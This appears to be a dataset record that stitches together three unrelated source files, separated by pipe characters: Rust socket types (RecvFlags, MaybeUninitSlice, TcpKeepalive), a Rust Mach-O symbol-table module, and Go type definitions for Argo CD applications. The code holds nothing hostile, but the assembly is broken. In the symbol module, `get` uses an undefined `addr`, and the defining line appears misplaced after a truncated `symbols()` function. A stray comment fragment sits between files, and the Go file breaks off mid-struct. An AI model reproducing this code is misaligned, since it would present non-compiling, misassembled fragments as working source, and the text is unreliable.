#[cfg_attr(docsrs, doc(cfg(not(target_os = "redox"))))]
#[derive(Copy, Clone, Eq, PartialEq)]
pub struct RecvFlags(c_int);

#[cfg(not(target_os = "redox"))]
impl RecvFlags {
    /// Check if the message contains a truncated datagram.
    ///
    /// This flag is only used for datagram-based sockets,
    /// not for stream sockets.
    ///
    /// On Unix this corresponds to the `MSG_TRUNC` flag.
    /// On Windows this corresponds to the `WSAEMSGSIZE` error code.
    pub const fn is_truncated(self) -> bool {
        // Bit-test against the platform's MSG_TRUNC constant.
        self.0 & sys::MSG_TRUNC != 0
    }
}
/// A version of [`IoSliceMut`] that allows the buffer to be uninitialised.
///
/// [`IoSliceMut`]: std::io::IoSliceMut
#[repr(transparent)]
pub struct MaybeUninitSlice<'a>(sys::MaybeUninitSlice<'a>);

// SAFETY: the wrapper only holds a mutable view over a byte buffer via the
// platform-specific inner type. NOTE(review): soundness of these impls relies
// on `sys::MaybeUninitSlice` holding no thread-affine state — confirm against
// the `sys` module.
unsafe impl<'a> Send for MaybeUninitSlice<'a> {}

unsafe impl<'a> Sync for MaybeUninitSlice<'a> {}

impl<'a> fmt::Debug for MaybeUninitSlice<'a> {
    fn fmt(&self, fmt: &mut fmt::Formatter<'_>) -> fmt::Result {
        // Delegate to the Debug output of the underlying byte slice.
        fmt::Debug::fmt(self.0.as_slice(), fmt)
    }
}

impl<'a> MaybeUninitSlice<'a> {
    /// Creates a new `MaybeUninitSlice` wrapping a byte slice.
    ///
    /// # Panics
    ///
    /// Panics on Windows if the slice is larger than 4GB.
    pub fn new(buf: &'a mut [MaybeUninit<u8>]) -> MaybeUninitSlice<'a> {
        MaybeUninitSlice(sys::MaybeUninitSlice::new(buf))
    }
}

impl<'a> Deref for MaybeUninitSlice<'a> {
    type Target = [MaybeUninit<u8>];

    fn deref(&self) -> &[MaybeUninit<u8>] {
        self.0.as_slice()
    }
}

impl<'a> DerefMut for MaybeUninitSlice<'a> {
    fn deref_mut(&mut self) -> &mut [MaybeUninit<u8>] {
        self.0.as_mut_slice()
    }
}
/// Configures a socket's TCP keepalive parameters.
///
/// See [`Socket::set_tcp_keepalive`].
#[derive(Debug, Clone)]
pub struct TcpKeepalive {
time: Option<Duration>,
#[cfg_attr(target_os = "redox", allow(dead_code))]
interval: Option<Duration>,
#[cfg_attr(target_os = "redox", allow(dead_code))]
retries: Option<u32>,
}
impl TcpKeepalive {
/// Returns a new, empty set of TCP keepalive parameters.
pub const fn new() -> TcpKeepalive {
TcpKeepalive {
time: None,
interval: None,
retries: None,
}
}
/// Set the amount of time after which TCP keepalive probes will be sent on
/// idle connections.
///
/// This will set `TCP_KEEPALIVE` on macOS and iOS, and
/// `TCP_KEEPIDLE` on all other Unix operating systems, except
/// OpenBSD and Haiku which don't support any way to set this
/// option. On Windows, this sets the value of the `tcp_keepalive`
/// struct's `keepalivetime` field.
///
/// Some platforms specify this value in seconds, so sub-second
/// specifications may be omitted.
pub const fn with_time(self, time: Duration) -> Self {
Self {
time: Some(time),
..self
}
}
/// Set the value of the `TCP_KEEPINTVL` option. On Windows, this sets the
/// value of the `tcp_keepalive` struct's `keepaliveinterval` field.
///
/// Sets the time interval between TCP keepalive probes.
///
/// Some platforms specify this value in seconds, so sub-second
/// specifications may be omitted.
#[cfg(all(
feature = "all",
any(
target_os = "dragonfly",
target_os = "freebsd",
target_os = "fuchsia",
target_os = "linux",
target_os = "netbsd",
target_vendor = "apple",
windows,
)
))]
#[cfg_attr(
docsrs,
doc(cfg(all(
feature = "all",
any(
target_os = "freebsd",
target_os = "fuchsia",
target_os = "linux",
target_os = "netbsd",
target_vendor = "apple",
windows,
)
)))
)]
pub const fn with_interval(self, interval: Duration) -> Self {
Self {
interval: Some(interval),
..self
}
}
/// Set the value of the `TCP_KEEPCNT` option.
///
/// Set the maximum number of TCP keepalive probes that will be sent before
/// dropping a connection, if TCP keepalive is enabled on this socket.
#[cfg(all(
feature = "all",
any(
doc,
target_os = "dragonfly",
target_os = "freebsd",
target_os = "fuchsia",
target_os = "linux",
target_os = "netbsd",
target_vendor = "apple",
)
))]
#[cfg_attr(
docsrs,
doc(cfg(all(
feature = "all",
any(
target_os = "freebsd",
target_os = "fuchsia",
target_os = "linux",
target_os = "netbsd",
target_vendor = "apple",
)
)))
)]
pub const fn with_retries(self, retries: u32) -> Self {
Self {
retries: Some(retries),
..self
}
}
} | // Need to specific the libc crate because Windows doesn't use |
symbols.rs | use std::borrow::Cow;
use std::collections::{BTreeMap, HashSet};
use std::iter::{IntoIterator, Peekable};
use std::slice;
use failure::ResultExt;
use goblin::mach;
use regex::Regex;
use symbolic_common::types::Name;
use object::{Object, ObjectError, ObjectErrorKind, ObjectTarget};
lazy_static! {
    // Matches "_hidden#<n>_" / "__hidden#<n>_" placeholder names that appear
    // when symbol names are redacted (see `Symbols::requires_symbolmap`).
    static ref HIDDEN_SYMBOL_RE: Regex = Regex::new("__?hidden#\\d+_").unwrap();
}
/// A single symbol in a `SymbolTable`.
#[derive(Debug)]
pub struct Symbol<'data> {
    name: Cow<'data, str>,
    addr: u64,
    len: Option<u64>,
}

impl<'data> Symbol<'data> {
    /// Binary string value of the symbol.
    pub fn name(&self) -> &Cow<'data, str> {
        &self.name
    }

    /// Address of this symbol.
    pub fn addr(&self) -> u64 {
        self.addr
    }

    /// Presumed length of the symbol, if one could be derived (see
    /// `SymbolsInternal::get`); `None` when the length is unknown.
    pub fn len(&self) -> Option<u64> {
        self.len
    }

    /// Returns `true` if the symbol has a known length of zero.
    /// Returns `false` when the length is non-zero or unknown.
    pub fn is_empty(&self) -> bool {
        self.len().map_or(false, |l| l == 0)
    }

    /// Returns the string representation of this symbol.
    pub fn as_str(&self) -> &str {
        self.name().as_ref()
    }
}
// Consuming conversions from a `Symbol` into its name in various forms.
// NOTE(review): implementing `From` on the target types is the modern
// convention; these `Into` impls are kept unchanged for API compatibility.
impl<'data> Into<Name<'data>> for Symbol<'data> {
    fn into(self) -> Name<'data> {
        Name::new(self.name)
    }
}

impl<'data> Into<Cow<'data, str>> for Symbol<'data> {
    fn into(self) -> Cow<'data, str> {
        self.name
    }
}

impl<'data> Into<String> for Symbol<'data> {
    fn into(self) -> String {
        self.name.into()
    }
}
/// Internal wrapper around certain symbol table implementations.
#[derive(Clone, Debug)]
enum SymbolsInternal<'data> {
MachO(&'data mach::symbols::Symbols<'data>),
}
impl<'data> SymbolsInternal<'data> {
/// Returns the symbol at the given index.
///
/// To compute the presumed length of a symbol, pass the index of the
/// logically next symbol (i.e. the one with the next greater address).
pub fn get(
&self,
index: usize,
next: Option<usize>,
) -> Result<Option<Symbol<'data>>, ObjectError> {
Ok(Some(match *self {
SymbolsInternal::MachO(symbols) => {
let (name, nlist) = symbols.get(index).context(ObjectErrorKind::BadObject)?;
let stripped = if name.starts_with('_') {
&name[1..]
} else {
name
}; | let len = next
.and_then(|index| symbols.get(index).ok())
.map(|(_, nlist)| nlist.n_value - addr);
Symbol {
name: Cow::Borrowed(stripped),
addr,
len,
}
}
}))
}
}
/// Internal type used to map addresses to symbol indices.
///
/// - `mapping.0`: The address of a symbol
/// - `mapping.1`: The index of a symbol in the symbol list
type IndexMapping = (u64, usize);
/// An iterator over `Symbol`s in a symbol table.
///
/// It can be obtained via `Symbols::iter`. This is primarily intended for
/// consuming all symbols in an object file. To look up single symbols, use
/// `Symbols::lookup` instead.
pub struct SymbolIterator<'data, 'sym>
where
    'data: 'sym,
{
    /// The symbol table this iterator walks.
    symbols: &'sym Symbols<'data>,
    /// Peekable cursor over (address, index) mappings, ordered by address.
    iter: Peekable<slice::Iter<'sym, IndexMapping>>,
}

impl<'data, 'sym> Iterator for SymbolIterator<'data, 'sym> {
    type Item = Result<Symbol<'data>, ObjectError>;

    fn next(&mut self) -> Option<Self::Item> {
        // Index of the current symbol; `?` ends iteration when the mapping
        // list is exhausted (replaces the previous manual match).
        let index = self.iter.next()?.1;
        // Peek at the following mapping so the symbol's length can be derived
        // from the next symbol's address.
        let next = self.iter.peek().map(|mapping| mapping.1);

        match self.symbols.internal.get(index, next) {
            Ok(Some(symbol)) => Some(Ok(symbol)),
            Ok(None) => None,
            Err(err) => Some(Err(err)),
        }
    }

    fn size_hint(&self) -> (usize, Option<usize>) {
        self.iter.size_hint()
    }

    fn count(self) -> usize {
        self.iter.count()
    }
}
/// Provides access to `Symbol`s of an `Object`.
///
/// It allows to either lookup single symbols with `Symbols::lookup` or iterate
/// them using `Symbols::iter`. Use `SymbolTable::symbols` on an `Object` to
/// retrieve the symbols.
pub struct Symbols<'data> {
    internal: SymbolsInternal<'data>,
    // (address, symbol index) pairs, sorted ascending by address.
    mappings: Vec<IndexMapping>,
}

impl<'data> Symbols<'data> {
    /// Creates a `Symbols` wrapper for MachO.
    ///
    /// Returns `Ok(None)` when the object carries no symbol table at all.
    fn from_macho(macho: &'data mach::MachO) -> Result<Option<Symbols<'data>>, ObjectError> {
        let macho_symbols = match macho.symbols {
            Some(ref symbols) => symbols,
            None => return Ok(None),
        };

        let mut sections = HashSet::new();
        let mut section_index = 0;

        // Cache section indices that we are interested in
        // (only "__stubs" and "__text" are considered).
        for segment in &macho.segments {
            for section_rv in segment {
                let (section, _) = section_rv.context(ObjectErrorKind::BadObject)?;
                let name = section.name().context(ObjectErrorKind::BadObject)?;
                if name == "__stubs" || name == "__text" {
                    sections.insert(section_index);
                }
                section_index += 1;
            }
        }

        // Build an ordered map of only symbols we are interested in
        // (keyed by address, so iteration below is sorted by address).
        let mut symbol_map = BTreeMap::new();
        for (symbol_index, symbol_result) in macho.symbols().enumerate() {
            let (_, nlist) = symbol_result.context(ObjectErrorKind::BadObject)?;
            // `n_sect` is 1-based; NO_SECT (0) marks symbols with no section,
            // hence the `- 1` when checking the cached section set.
            let in_valid_section = nlist.get_type() == mach::symbols::N_SECT
                && nlist.n_sect != (mach::symbols::NO_SECT as usize)
                && sections.contains(&(nlist.n_sect - 1));

            if in_valid_section {
                symbol_map.insert(nlist.n_value, symbol_index);
            }
        }

        Ok(Some(Symbols {
            internal: SymbolsInternal::MachO(macho_symbols),
            mappings: symbol_map.into_iter().collect(),
        }))
    }

    /// Searches for a single `Symbol` inside the symbol table.
    ///
    /// Binary-searches for the symbol with the greatest start address not
    /// exceeding `addr`; returns `Ok(None)` when `addr` lies before the first
    /// mapped symbol.
    pub fn lookup(&self, addr: u64) -> Result<Option<Symbol<'data>>, ObjectError> {
        let found = match self.mappings.binary_search_by_key(&addr, |&x| x.0) {
            Ok(idx) => idx,
            Err(0) => return Ok(None),
            Err(next_idx) => next_idx - 1,
        };

        let index = self.mappings[found].1;
        // The next mapping (if any) bounds the presumed symbol length.
        let next = self.mappings.get(found + 1).map(|mapping| mapping.1);
        self.internal.get(index, next)
    }

    /// Checks whether this binary contains hidden symbols.
    ///
    /// This is an indication that BCSymbolMaps are needed to symbolicate
    /// symbols correctly.
    pub fn requires_symbolmap(&self) -> bool {
        // Hidden symbols can only ever occur in Apple's dSYM
        match self.internal {
            SymbolsInternal::MachO(..) => (),
        };

        // Symbols that fail to resolve are treated as not hidden.
        for symbol in self.iter() {
            if symbol
                .map(|s| HIDDEN_SYMBOL_RE.is_match(s.as_str()))
                .unwrap_or(false)
            {
                return true;
            }
        }

        false
    }

    /// Returns an iterator over all mapped symbols, ordered by address.
    pub fn iter<'sym>(&'sym self) -> SymbolIterator<'data, 'sym> {
        SymbolIterator {
            symbols: self,
            iter: self.mappings.iter().peekable(),
        }
    }
}
/// Gives access to the symbol table of an `Object` file.
pub trait SymbolTable {
    /// Returns the symbols of this `Object`.
    ///
    /// If the symbol table has been stripped from the object, `None` is returned. In case a symbol
    /// table is present, but the trait has not been implemented for the object kind, an error is
    /// returned.
    fn symbols(&self) -> Result<Option<Symbols>, ObjectError> {
// The length is only calculated if `next` is specified and does
// not result in an error. Otherwise, errors here are swallowed.
let addr = nlist.n_value; |
types.go | package v1alpha1
import (
"encoding/json"
"fmt"
math "math"
"net"
"net/http"
"net/url"
"os"
"path/filepath"
"reflect"
"regexp"
"sort"
"strconv"
"strings"
"time"
"github.com/argoproj/gitops-engine/pkg/health"
synccommon "github.com/argoproj/gitops-engine/pkg/sync/common"
"github.com/ghodss/yaml"
"github.com/google/go-cmp/cmp"
"github.com/robfig/cron"
log "github.com/sirupsen/logrus"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/status"
v1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/runtime/schema"
utilnet "k8s.io/apimachinery/pkg/util/net"
"k8s.io/apimachinery/pkg/watch"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"k8s.io/client-go/tools/clientcmd/api"
"github.com/argoproj/argo-cd/common"
"github.com/argoproj/argo-cd/util/cert"
"github.com/argoproj/argo-cd/util/git"
"github.com/argoproj/argo-cd/util/glob"
"github.com/argoproj/argo-cd/util/helm"
)
// Application is a definition of Application resource.
// +genclient
// +genclient:noStatus
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
// +kubebuilder:resource:path=applications,shortName=app;apps
// +kubebuilder:printcolumn:name="Sync Status",type=string,JSONPath=`.status.sync.status`
// +kubebuilder:printcolumn:name="Health Status",type=string,JSONPath=`.status.health.status`
// +kubebuilder:printcolumn:name="Revision",type=string,JSONPath=`.status.sync.revision`,priority=10
type Application struct {
metav1.TypeMeta `json:",inline"`
metav1.ObjectMeta `json:"metadata" protobuf:"bytes,1,opt,name=metadata"`
Spec ApplicationSpec `json:"spec" protobuf:"bytes,2,opt,name=spec"`
Status ApplicationStatus `json:"status,omitempty" protobuf:"bytes,3,opt,name=status"`
Operation *Operation `json:"operation,omitempty" protobuf:"bytes,4,opt,name=operation"`
}
// ApplicationSpec represents desired application state. Contains link to repository with application definition and additional parameters link definition revision.
type ApplicationSpec struct {
// Source is a reference to the location ksonnet application definition
Source ApplicationSource `json:"source" protobuf:"bytes,1,opt,name=source"`
// Destination overrides the kubernetes server and namespace defined in the environment ksonnet app.yaml
Destination ApplicationDestination `json:"destination" protobuf:"bytes,2,name=destination"`
// Project is a application project name. Empty name means that application belongs to 'default' project.
Project string `json:"project" protobuf:"bytes,3,name=project"`
// SyncPolicy controls when a sync will be performed
SyncPolicy *SyncPolicy `json:"syncPolicy,omitempty" protobuf:"bytes,4,name=syncPolicy"`
// IgnoreDifferences controls resources fields which should be ignored during comparison
IgnoreDifferences []ResourceIgnoreDifferences `json:"ignoreDifferences,omitempty" protobuf:"bytes,5,name=ignoreDifferences"`
// Infos contains a list of useful information (URLs, email addresses, and plain text) that relates to the application
Info []Info `json:"info,omitempty" protobuf:"bytes,6,name=info"`
// This limits this number of items kept in the apps revision history.
// This should only be changed in exceptional circumstances.
// Setting to zero will store no history. This will reduce storage used.
// Increasing will increase the space used to store the history, so we do not recommend increasing it.
// Default is 10.
RevisionHistoryLimit *int64 `json:"revisionHistoryLimit,omitempty" protobuf:"bytes,7,name=revisionHistoryLimit"`
}
// ResourceIgnoreDifferences contains resource filter and list of json paths which should be ignored during comparison with live state.
type ResourceIgnoreDifferences struct {
Group string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
Kind string `json:"kind" protobuf:"bytes,2,opt,name=kind"`
Name string `json:"name,omitempty" protobuf:"bytes,3,opt,name=name"`
Namespace string `json:"namespace,omitempty" protobuf:"bytes,4,opt,name=namespace"`
JSONPointers []string `json:"jsonPointers" protobuf:"bytes,5,opt,name=jsonPointers"`
}
// EnvEntry is a single name/value pair of an environment.
type EnvEntry struct {
	// the name, usually uppercase
	Name string `json:"name" protobuf:"bytes,1,opt,name=name"`
	// the value
	Value string `json:"value" protobuf:"bytes,2,opt,name=value"`
}

// IsZero reports whether the entry is nil or has neither a name nor a value.
func (a *EnvEntry) IsZero() bool {
	if a == nil {
		return true
	}
	return a.Name == "" && a.Value == ""
}

// NewEnvEntry parses a "param=value" string into an EnvEntry. The value may
// itself contain '=' characters; only the first one separates name from value.
func NewEnvEntry(text string) (*EnvEntry, error) {
	parts := strings.SplitN(text, "=", 2)
	if len(parts) != 2 {
		return nil, fmt.Errorf("Expected env entry of the form: param=value. Received: %s", text)
	}
	entry := EnvEntry{Name: parts[0], Value: parts[1]}
	return &entry, nil
}

// Env is a list of environment entries.
type Env []*EnvEntry

// IsZero reports whether the environment has no entries.
func (e Env) IsZero() bool {
	return len(e) == 0
}

// Environ renders the environment as "name=value" strings, skipping zero
// entries. It returns a nil slice when nothing qualifies.
func (e Env) Environ() []string {
	var environ []string
	for _, item := range e {
		if item.IsZero() {
			continue
		}
		environ = append(environ, item.Name+"="+item.Value)
	}
	return environ
}

// Envsubst does an operation similar to the `envsubst` tool: it expands
// $VAR and ${VAR} references in s using this environment. Unknown variables
// expand to the empty string.
func (e Env) Envsubst(s string) string {
	lookup := make(map[string]string, len(e))
	for _, item := range e {
		lookup[item.Name] = item.Value
	}
	return os.Expand(s, func(name string) string {
		return lookup[name]
	})
}
// ApplicationSource contains information about github repository, path within repository and target application environment.
type ApplicationSource struct {
	// RepoURL is the repository URL of the application manifests
	RepoURL string `json:"repoURL" protobuf:"bytes,1,opt,name=repoURL"`
	// Path is a directory path within the Git repository
	Path string `json:"path,omitempty" protobuf:"bytes,2,opt,name=path"`
	// TargetRevision defines the commit, tag, or branch in which to sync the application to.
	// If omitted, will sync to HEAD
	TargetRevision string `json:"targetRevision,omitempty" protobuf:"bytes,4,opt,name=targetRevision"`
	// Helm holds helm specific options
	Helm *ApplicationSourceHelm `json:"helm,omitempty" protobuf:"bytes,7,opt,name=helm"`
	// Kustomize holds kustomize specific options
	Kustomize *ApplicationSourceKustomize `json:"kustomize,omitempty" protobuf:"bytes,8,opt,name=kustomize"`
	// Ksonnet holds ksonnet specific options
	Ksonnet *ApplicationSourceKsonnet `json:"ksonnet,omitempty" protobuf:"bytes,9,opt,name=ksonnet"`
	// Directory holds path/directory specific options
	Directory *ApplicationSourceDirectory `json:"directory,omitempty" protobuf:"bytes,10,opt,name=directory"`
	// ConfigManagementPlugin holds config management plugin specific options
	Plugin *ApplicationSourcePlugin `json:"plugin,omitempty" protobuf:"bytes,11,opt,name=plugin"`
	// Chart is a Helm chart name. A non-empty Chart marks the source as a Helm
	// chart source (see IsHelm) rather than a Git path.
	Chart string `json:"chart,omitempty" protobuf:"bytes,12,opt,name=chart"`
	// NOTE(review): protobuf field numbers 3, 5 and 6 are skipped — presumably
	// removed legacy fields kept reserved for wire compatibility; confirm
	// before reusing those numbers.
}
// AllowsConcurrentProcessing returns true if given application source can be processed concurrently.
// Kustomize overrides rewrite kustomization.yaml and ksonnet parameter
// overrides rewrite params.libsonnet, so when either tool is configured the
// decision is delegated to that tool's own options.
func (a *ApplicationSource) AllowsConcurrentProcessing() bool {
	if a.Kustomize != nil {
		return a.Kustomize.AllowsConcurrentProcessing()
	}
	if a.Ksonnet != nil {
		return a.Ksonnet.AllowsConcurrentProcessing()
	}
	return true
}
// IsHelm reports whether the source points at a Helm chart (Chart is set)
// rather than a Git repository path.
func (a *ApplicationSource) IsHelm() bool {
	return len(a.Chart) > 0
}
// IsHelmOci reports whether the source refers to a Helm chart and that chart
// is identified as an OCI chart by the helm package.
func (a *ApplicationSource) IsHelmOci() bool {
	return a.Chart != "" && helm.IsHelmOciChart(a.Chart)
}
// IsZero reports whether the source is nil or has every field unset
// (including all tool-specific option sub-structs).
func (a *ApplicationSource) IsZero() bool {
	if a == nil {
		return true
	}
	return a.RepoURL == "" &&
		a.Path == "" &&
		a.TargetRevision == "" &&
		a.Helm.IsZero() &&
		a.Kustomize.IsZero() &&
		a.Ksonnet.IsZero() &&
		a.Directory.IsZero() &&
		a.Plugin.IsZero()
}
// ApplicationSourceType specifies the config management tool of an application source.
type ApplicationSourceType string

// Recognized application source types.
const (
	ApplicationSourceTypeHelm      ApplicationSourceType = "Helm"
	ApplicationSourceTypeKustomize ApplicationSourceType = "Kustomize"
	ApplicationSourceTypeKsonnet   ApplicationSourceType = "Ksonnet"
	ApplicationSourceTypeDirectory ApplicationSourceType = "Directory"
	ApplicationSourceTypePlugin    ApplicationSourceType = "Plugin"
)

// RefreshType specifies how an application refresh is requested.
type RefreshType string

const (
	// RefreshTypeNormal requests a regular refresh.
	RefreshTypeNormal RefreshType = "normal"
	// RefreshTypeHard requests a "hard" refresh — presumably one that bypasses
	// caches; confirm against the controller's refresh handling.
	RefreshTypeHard RefreshType = "hard"
)
// ApplicationSourceHelm holds helm specific options
type ApplicationSourceHelm struct {
	// ValueFiles is a list of Helm value files to use when generating a template
	ValueFiles []string `json:"valueFiles,omitempty" protobuf:"bytes,1,opt,name=valueFiles"`
	// Parameters are parameters to the helm template
	Parameters []HelmParameter `json:"parameters,omitempty" protobuf:"bytes,2,opt,name=parameters"`
	// ReleaseName is the Helm release name. If omitted it will use the application name
	ReleaseName string `json:"releaseName,omitempty" protobuf:"bytes,3,opt,name=releaseName"`
	// Values is Helm values, typically defined as a block
	Values string `json:"values,omitempty" protobuf:"bytes,4,opt,name=values"`
	// FileParameters are file parameters to the helm template
	FileParameters []HelmFileParameter `json:"fileParameters,omitempty" protobuf:"bytes,5,opt,name=fileParameters"`
	// Version is the Helm version to use for templating with
	Version string `json:"version,omitempty" protobuf:"bytes,6,opt,name=version"`
}
// HelmParameter is a parameter to a helm template
type HelmParameter struct {
	// Name is the name of the helm parameter
	Name string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
	// Value is the value for the helm parameter
	Value string `json:"value,omitempty" protobuf:"bytes,2,opt,name=value"`
	// ForceString determines whether to tell Helm to interpret booleans and numbers as strings
	ForceString bool `json:"forceString,omitempty" protobuf:"bytes,3,opt,name=forceString"`
}

// HelmFileParameter is a file parameter to a helm template
type HelmFileParameter struct {
	// Name is the name of the helm parameter
	Name string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
	// Path is the path value for the helm parameter
	Path string `json:"path,omitempty" protobuf:"bytes,2,opt,name=path"`
}

// helmParameterRx matches a comma that is not already preceded by a backslash.
var helmParameterRx = regexp.MustCompile(`([^\\]),`)

// escapeHelmCommas backslash-escapes every unescaped comma in value so the
// value survives Helm's comma-separated --set parsing.
func escapeHelmCommas(value string) string {
	return helmParameterRx.ReplaceAllString(value, `$1\,`)
}

// NewHelmParameter parses a "param=value" string into a HelmParameter,
// escaping unescaped commas in the value. It returns an error when the
// input has no '=' separator.
func NewHelmParameter(text string, forceString bool) (*HelmParameter, error) {
	sep := strings.Index(text, "=")
	if sep < 0 {
		return nil, fmt.Errorf("Expected helm parameter of the form: param=value. Received: %s", text)
	}
	return &HelmParameter{
		Name:        text[:sep],
		Value:       escapeHelmCommas(text[sep+1:]),
		ForceString: forceString,
	}, nil
}

// NewHelmFileParameter parses a "param=path" string into a HelmFileParameter,
// escaping unescaped commas in the path. It returns an error when the input
// has no '=' separator.
func NewHelmFileParameter(text string) (*HelmFileParameter, error) {
	sep := strings.Index(text, "=")
	if sep < 0 {
		return nil, fmt.Errorf("Expected helm file parameter of the form: param=path. Received: %s", text)
	}
	return &HelmFileParameter{
		Name: text[:sep],
		Path: escapeHelmCommas(text[sep+1:]),
	}, nil
}
// AddParameter upserts p into the helm parameters: an existing parameter with
// the same name is replaced, otherwise p is appended.
func (in *ApplicationSourceHelm) AddParameter(p HelmParameter) {
	for i := range in.Parameters {
		if in.Parameters[i].Name == p.Name {
			in.Parameters[i] = p
			return
		}
	}
	in.Parameters = append(in.Parameters, p)
}
// AddFileParameter upserts p into the helm file parameters: an existing file
// parameter with the same name is replaced, otherwise p is appended.
func (in *ApplicationSourceHelm) AddFileParameter(p HelmFileParameter) {
	for i := range in.FileParameters {
		if in.FileParameters[i].Name == p.Name {
			in.FileParameters[i] = p
			return
		}
	}
	in.FileParameters = append(in.FileParameters, p)
}
// IsZero reports whether the helm options are nil or entirely unset.
func (h *ApplicationSourceHelm) IsZero() bool {
	if h == nil {
		return true
	}
	return h.Version == "" &&
		h.ReleaseName == "" &&
		len(h.ValueFiles) == 0 &&
		len(h.Parameters) == 0 &&
		len(h.FileParameters) == 0 &&
		h.Values == ""
}
// KustomizeImage is a Kustomize image override, in one of the forms
// name=newName, name:tag or name@digest.
type KustomizeImage string

// delim returns the first of "=", ":", "@" present in the image spec,
// defaulting to ":" when none of them occurs.
func (i KustomizeImage) delim() string {
	switch {
	case strings.Contains(string(i), "="):
		return "="
	case strings.Contains(string(i), ":"):
		return ":"
	case strings.Contains(string(i), "@"):
		return "@"
	}
	return ":"
}

// Match reports whether i refers to the same image name as j, i.e. whether i
// starts with everything in j up to j's first delimiter. When j contains no
// delimiter at all it can never match.
func (i KustomizeImage) Match(j KustomizeImage) bool {
	d := j.delim()
	if !strings.Contains(string(j), d) {
		return false
	}
	name := strings.SplitN(string(j), d, 2)[0]
	return strings.HasPrefix(string(i), name)
}

// KustomizeImages is a list of Kustomize image overrides.
type KustomizeImages []KustomizeImage

// Find returns the index of the override matching image, or -1 when absent.
func (images KustomizeImages) Find(image KustomizeImage) int {
	for idx := range images {
		if images[idx].Match(image) {
			return idx
		}
	}
	return -1
}
// ApplicationSourceKustomize holds kustomize specific options
type ApplicationSourceKustomize struct {
	// NamePrefix is a prefix appended to resources for kustomize apps
	NamePrefix string `json:"namePrefix,omitempty" protobuf:"bytes,1,opt,name=namePrefix"`
	// NameSuffix is a suffix appended to resources for kustomize apps
	NameSuffix string `json:"nameSuffix,omitempty" protobuf:"bytes,2,opt,name=nameSuffix"`
	// Images are kustomize image overrides
	Images KustomizeImages `json:"images,omitempty" protobuf:"bytes,3,opt,name=images"`
	// CommonLabels adds additional kustomize commonLabels
	CommonLabels map[string]string `json:"commonLabels,omitempty" protobuf:"bytes,4,opt,name=commonLabels"`
	// Version contains optional Kustomize version
	Version string `json:"version,omitempty" protobuf:"bytes,5,opt,name=version"`
	// CommonAnnotations adds additional kustomize commonAnnotations
	CommonAnnotations map[string]string `json:"commonAnnotations,omitempty" protobuf:"bytes,6,opt,name=commonAnnotations"`
}
// AllowsConcurrentProcessing returns true when no override is set that would
// require rewriting kustomization.yaml, so templating can run concurrently.
// NOTE(review): CommonAnnotations and Version are not considered here, unlike
// in IsZero — confirm that is intended.
func (k *ApplicationSourceKustomize) AllowsConcurrentProcessing() bool {
	switch {
	case len(k.Images) > 0,
		len(k.CommonLabels) > 0,
		k.NamePrefix != "",
		k.NameSuffix != "":
		return false
	}
	return true
}
// IsZero reports whether the kustomize options are nil or entirely unset.
func (k *ApplicationSourceKustomize) IsZero() bool {
	if k == nil {
		return true
	}
	return k.NamePrefix == "" &&
		k.NameSuffix == "" &&
		k.Version == "" &&
		len(k.Images) == 0 &&
		len(k.CommonLabels) == 0 &&
		len(k.CommonAnnotations) == 0
}
// MergeImage either updates the existing override for image's name or,
// when none matches, appends image as a new override.
func (k *ApplicationSourceKustomize) MergeImage(image KustomizeImage) {
	if idx := k.Images.Find(image); idx >= 0 {
		k.Images[idx] = image
		return
	}
	k.Images = append(k.Images, image)
}
// JsonnetVar is a jsonnet variable
type JsonnetVar struct {
	Name  string `json:"name" protobuf:"bytes,1,opt,name=name"`
	Value string `json:"value" protobuf:"bytes,2,opt,name=value"`
	Code  bool   `json:"code,omitempty" protobuf:"bytes,3,opt,name=code"`
}

// NewJsonnetVar parses "name=value" into a JsonnetVar; when s contains no
// '=', the whole string becomes the name and the value stays empty.
func NewJsonnetVar(s string, code bool) JsonnetVar {
	if sep := strings.Index(s, "="); sep >= 0 {
		return JsonnetVar{Name: s[:sep], Value: s[sep+1:], Code: code}
	}
	return JsonnetVar{Name: s, Code: code}
}

// ApplicationSourceJsonnet holds jsonnet specific options
type ApplicationSourceJsonnet struct {
	// ExtVars is a list of Jsonnet External Variables
	ExtVars []JsonnetVar `json:"extVars,omitempty" protobuf:"bytes,1,opt,name=extVars"`
	// TLAS is a list of Jsonnet Top-level Arguments
	TLAs []JsonnetVar `json:"tlas,omitempty" protobuf:"bytes,2,opt,name=tlas"`
	// Libs is a list of additional library search dirs
	Libs []string `json:"libs,omitempty" protobuf:"bytes,3,opt,name=libs"`
}

// IsZero reports whether the jsonnet options are nil or entirely unset.
func (j *ApplicationSourceJsonnet) IsZero() bool {
	if j == nil {
		return true
	}
	return len(j.ExtVars) == 0 && len(j.TLAs) == 0 && len(j.Libs) == 0
}
// ApplicationSourceKsonnet holds ksonnet specific options
type ApplicationSourceKsonnet struct {
	// Environment is a ksonnet application environment name
	Environment string `json:"environment,omitempty" protobuf:"bytes,1,opt,name=environment"`
	// Parameters are a list of ksonnet component parameter override values
	Parameters []KsonnetParameter `json:"parameters,omitempty" protobuf:"bytes,2,opt,name=parameters"`
}

// KsonnetParameter is a ksonnet component parameter
type KsonnetParameter struct {
	Component string `json:"component,omitempty" protobuf:"bytes,1,opt,name=component"`
	Name      string `json:"name" protobuf:"bytes,2,opt,name=name"`
	Value     string `json:"value" protobuf:"bytes,3,opt,name=value"`
}

// AllowsConcurrentProcessing returns true when there are no parameter
// overrides; overrides rewrite params.libsonnet and preclude concurrency.
func (k *ApplicationSourceKsonnet) AllowsConcurrentProcessing() bool {
	return len(k.Parameters) == 0
}

// IsZero reports whether the ksonnet options are nil or entirely unset.
func (k *ApplicationSourceKsonnet) IsZero() bool {
	if k == nil {
		return true
	}
	return k.Environment == "" && len(k.Parameters) == 0
}
// ApplicationSourceDirectory holds options for directory-of-manifests sources.
type ApplicationSourceDirectory struct {
	// Recurse enables descending into subdirectories
	Recurse bool `json:"recurse,omitempty" protobuf:"bytes,1,opt,name=recurse"`
	// Jsonnet holds jsonnet specific options
